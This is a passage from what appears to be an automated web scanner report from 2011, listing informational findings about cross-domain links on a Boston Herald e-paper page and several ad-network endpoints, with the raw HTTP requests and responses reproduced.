Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.27.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/
If-Modified-Since: Sat, 17 Sep 2011 01:04:41 GMT

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 17 Sep 2011 01:16:42 GMT
Last-Modified: Sat, 17 Sep 2011 01:06:42 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 3
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:06:41 GMT
Content-Length: 10955

<nobr><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, 'e8459750-9218-41e4-8a6d-5bdc7aaad8fa', this)" onmousemove="HomePageManager.BubbleManager.show(6, 'e8459750-9218-41e4-
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, '2e916798-aedb-4f95-b2de-278f11844cea', this)" onmousemove="HomePageManager.BubbleManager.show(6, '2e916798-aedb-4f95-b2de-27
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, '76cf36c5-2401-4c81-8cb7-ab95cfb923ec', this)" onmousemove="HomePageManager.BubbleManager.show(6, '76cf36c5-2401-4c81-8cb7-ab
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, '3a969a86-06d7-4723-afe7-3491b02dc41b', this)" onmousemove="HomePageManager.BubbleManager.show(6, '3a969a86-06d7-4723-afe7-34
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, '88103383-b07b-4c0f-bddb-e79e2fc06613', this)" onmousemove="HomePageManager.BubbleManager.show(6, '88103383-b07b-4c0f-bddb-e7
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, '32a6e895-ffb4-4bb6-a31e-5fcc068b61b1', this)" onmousemove="HomePageManager.BubbleManager.show(6, '32a6e895-ffb4-4bb6-a31e-5f
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, 'c6a2b113-540b-4d80-b9cd-e6d54aa5a47c', this)" onmousemove="HomePageManager.BubbleManager.show(6, 'c6a2b113-540b-4d80-b9cd-e6
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, 'b34c81a4-69bb-4738-8a4b-ccba7448f889', this)" onmousemove="HomePageManager.BubbleManager.show(6, 'b34c81a4-69bb-4738-8a4b-cc
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, 'd144899b-383e-4de4-a995-555257fdb8c8', this)" onmousemove="HomePageManager.BubbleManager.show(6, 'd144899b-383e-4de4-a995-55
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, 'cfbeb65e-954e-4570-90eb-80afd8c6b442', this)" onmousemove="HomePageManager.BubbleManager.show(6, 'cfbeb65e-954e-4570-90eb-80
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, '3cd2a32d-c537-4897-9399-3f34e3a45279', this)" onmousemove="HomePageManager.BubbleManager.show(6, '3cd2a32d-c537-4897-9399-3f
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, 'd5f6af70-e560-4cf5-989a-c427891c9ae0', this)" onmousemove="HomePageManager.BubbleManager.show(6, 'd5f6af70-e560-4cf5-989a-c4
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, 'bea3d821-b4ff-4756-ad13-edf99ac83eff', this)" onmousemove="HomePageManager.BubbleManager.show(6, 'bea3d821-b4ff-4756-ad13-ed
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, '9ac87901-047d-482e-bf70-c41910700876', this)" onmousemove="HomePageManager.BubbleManager.show(6, '9ac87901-047d-482e-bf70-c4
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, 'c040cac6-df92-4705-8e65-115ea71f85a1', this)" onmousemove="HomePageManager.BubbleManager.show(6, 'c040cac6-df92-4705-8e65-11
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /><span class="news_title" onmouseover="HomePageManager.BubbleManager.show(6, '8ede3213-2e81-4298-8783-d55093bc5abc', this)" onmousemove="HomePageManager.BubbleManager.show(6, '8ede3213-2e81-4298-8783-d5
...[SNIP]...
</span><img width="35" height="1" src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/1x1.gif" /></nobr>

17.48. http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/homepage_v2.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /epaper/homepage_v2.aspx?date=17.9.2011&width=1087 HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/HomePageRedir.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 3
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:41:17 GMT
Content-Length: 74260


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><script type="text/javascript">
window.NDScriptsVers
...[SNIP]...
<![if (!IE)|(gte IE 7)]>
<link href="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/WebResource.ashx?style=style_ver3.css$style-gen2.css$se_bostonheraldnie.css&v=52535864&caching=1" type="text/css" rel="stylesheet">
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=core&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=home3&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=menu.js&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=ui.js&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
<script src="http://cache2-scripts.pressdisplay.com/res/WebResource.ashx?script=imggallerymanager.js&v=1403&caching=1" charset="utf-8" type="text/javascript"></script>
...[SNIP]...
<td width="240" align="center" valign="middle" class="se_bostonheraldnie_welcome_logo">
<img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/se_bostonheraldnie_logo2.gif" width="200" height="92" /></td>
...[SNIP]...
<a href="/epaper/pageview.aspx?issue=10892011091600000051001001"><img src="http://cache2-thumb1.pressdisplay.com/pressdisplay/docserver/getimage.aspx?file=10892011091600000051001001&page=1&scale=52" border="0" /></a>
...[SNIP]...
<a href="#" onclick="hidehp();ImgGalleryManager.show(0,'10892011091600000051001001');"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/se_bostonheraldnie_gallery.gif" width="190" height="31" /></a>
...[SNIP]...
<a href="javascript:;" onclick="try{HomePageManager.Pictures.openSlideShow()}catch(e){}"><img
src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/wip_but_max3.gif" width="17" height="15">
</a>
...[SNIP]...
<a
href="javascript:;" onclick="if(window.HomePageManager)HomePageManager.Pictures.showNext(-1)"><img
src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/wip_but_prev3.gif" width="20" height="15">
</a></span><span><a
id="play_button" href="javascript:;" onclick="if(window.HomePageManager)HomePageManager.Pictures.play_stop()"><img
src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/wip_but_play3.gif" width="17" height="15">
</a><a id="stop_button"
href="javascript:;" onclick="if(window.HomePageManager)HomePageManager.Pictures.play_stop()"
style="display: none"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/wip_but_pause3.gif" width="17" height="15"></a></span><span><a
href="javascript:;" onclick="if(window.HomePageManager)HomePageManager.Pictures.showNext(1)"><img
src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/wip_but_next3.gif" width="20" height="15">
</a>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=47a9b2b0-91be-400a-8f04-6330867a2c04&scale=11" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=0372d482-3eac-4731-91c1-6d8fb500a39e&scale=22" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=06d9d4a0-501e-4ff1-8e6e-4a34aa87ce80&scale=65" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=534c388f-1f02-4f74-8f81-d85f8a773c01&scale=54" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=b0b16248-06df-438b-8131-c8f666655df0&scale=29" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=ebff51ab-14d1-4293-a7b1-dddb8ac2a408&scale=34" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=1c9e4e7b-d341-463d-a54e-1f454c6c02b8&scale=131" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=3e50030e-32cb-427c-8107-9c4e66ca3bd0&scale=27" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=7bdb3e5e-6ed3-4651-b594-e1a25261f032&scale=29" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=0249768e-44eb-49f2-be85-0d17d01b9f81&scale=21" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=b30ae505-e645-4e9d-97f5-d3684c483773&scale=43" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=68b38e1a-a891-445f-b383-2b764aeebd89&scale=22" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=9771aaef-f382-4ac2-8b40-d0b2b6ff2fd7&scale=16" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=51ed887c-1194-4769-aa6a-b346cf57a229&scale=34" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=b614ee9c-b091-4ecb-b53d-8c84ffa9d306&scale=70" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=0372d482-3eac-4731-91c1-6d8fb500a39e&scale=22" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=b30ae505-e645-4e9d-97f5-d3684c483773&scale=43" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=b0b16248-06df-438b-8131-c8f666655df0&scale=29" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=06787794-c341-4fc1-9c6c-e956d99e6637&scale=17" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=06d9d4a0-501e-4ff1-8e6e-4a34aa87ce80&scale=66" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=3e50030e-32cb-427c-8107-9c4e66ca3bd0&scale=27" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=d52422f5-517a-4c9f-b52f-dbcc82242df5&scale=23" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=308f143e-cbc9-49f8-8c1c-2d8ff631defa&scale=27" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=ae4b0068-c21c-4a57-87b8-192acdd1f2a5&scale=51" />
</td>
...[SNIP]...
<td valign="top">
<img align="right" src="http://cache2-thumb2.pressdisplay.com/pressdisplay/docserver/getimage.aspx?regionguid=4385d94d-324b-43df-a34c-62c983aeb6c4&scale=34" />
</td>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_modeMenu.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_zoom.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_send.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/wp_plus.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_prn.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_rss.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_save.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_help.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_blog.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_delicious.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_facebook.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_digg.gif" width="30" height="30" border="0" /></div>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/se_bostonheraldnie_service_QUG.gif" width="104" height="30" border="0" /></div>
...[SNIP]...
<td width="30"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_services.gif" width="30" height="30" border="0" /></td>
...[SNIP]...
<div align="left"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/se_bostonheraldnie_search_QUG.gif" width="90" height="30" border="0" /></div>
...[SNIP]...
<td valign="" width="30"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_arrow.gif" width="30" height="30" border="0" /></td>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/se_bostonheraldnie_signin_QUG.gif" width="100" height="30" border="0" /></div>
...[SNIP]...
<td valign="" width="30"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_login.gif" width="30" height="30" border="0" /></td>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/se_bostonheraldnie_signout_QUG.gif" width="90" height="30" border="0" /></div>
...[SNIP]...
<td valign="" width="30"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/toolb_but_logout.gif" width="30" height="30" border="0" /></td>
...[SNIP]...
<div align="center"><img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/se_bostonheraldnie_translate_QUG.gif" width="90" height="30" border="0" /></div>
...[SNIP]...
<div class="t5" align="center" style="color: #999; font-size: 10px; padding: 10px 0px 50px 0px;">&copy; Copyright by the <a href="http://www.bostonherald.com" target="_blank">Boston Herald</a>
and <a href="http://www.heraldmedia.com" target="_blank">Herald Media</a>
...[SNIP]...
<td width="20">
<img src="http://cache2-styles.pressdisplay.com/res/en-us/g423/t53560269/images/p_x.gif" width="20" height="22" border="0" style="cursor: pointer;"
onclick="try{HomePageManager.Dialogs.hide();}catch(e){}">

</td>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

17.49. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?pixid=99004989 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/cntacp_22UverseLPtest_LP_1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=rTvUCIe7kwIQt6DI6wM&amp;guid=ON&amp;script=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 270
Date: Sat, 17 Sep 2011 01:38:53 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://www.googleadservices.com/pagead/conversion/1030885431/?label=rTvUCIe7kwIQt6DI6wM&amp;amp;guid=ON&amp;amp;script=0">here</a>
...[SNIP]...

17.50. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=3B562A1A-AFF3-45E2-AA47-9F7ABA49731B&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D71499648%26rk1%3D83196381%26rk2%3D1316239662.087%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=71499648&rk1=83196381&rk2=1316239662.087&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:06:16 GMT
Content-Type: text/html
Content-Length: 2949
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzT0KgDAMhuGrSGYL5q9p3VKwpxE3J_HuJm7vA_nIA8ywL9Qb13UBpoCRNpQQBoCHVnL04nNyET2ouIuVPs2HSzfGATnNY1PaLEW_sjSqKrdIibzu84ys.WcjxfcDjPAZ5g--%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
UE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp://clk.atdmt.com/COM/go/335787632/direct;wi.728;hi.90/01/" target="_blank"><img border="0" src="http://view.atdmt.com/COM/view/335787632/direct;wi.728;hi.90/01/" /></a>
...[SNIP]...

17.51. http://ca.rtb.prod2.invitemedia.com/build_creative  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ca.rtb.prod2.invitemedia.com
Path:   /build_creative

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=&cost=0.7415&mapped_uid=7-55785307-A5DC-4E3A-B452-DDBD426D3A1D&us_id=6538&creative_id=130642&campaign_id=66395&source_url=http%3A%2F%2Fwww.bostonherald.com&exch_id=7&auction_id=C3838ED1-0264-4F92-BB08-800A088CFCDE&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000007248707%26sd%3D2x728x90%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D67673251%26rk1%3D17154153%26rk2%3D1316239503.607%26pt%3D0&line_item_id=725814&invite_uid=d454714d-69b5-4195-969b-ba426f1012c3&zip_code=75207 HTTP/1.1
Host: ca.rtb.prod2.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=67673251&rk1=17154153&rk2=1316239503.607&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:29:08 GMT
Content-Type: text/html
Content-Length: 2949
Connection: keep-alive

<html>
<style>
body { margin:0px; padding:0px; }
</style>
<body>
<iframe src="http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"><script language="JavaScript" type="text/javascript">
...[SNIP]...
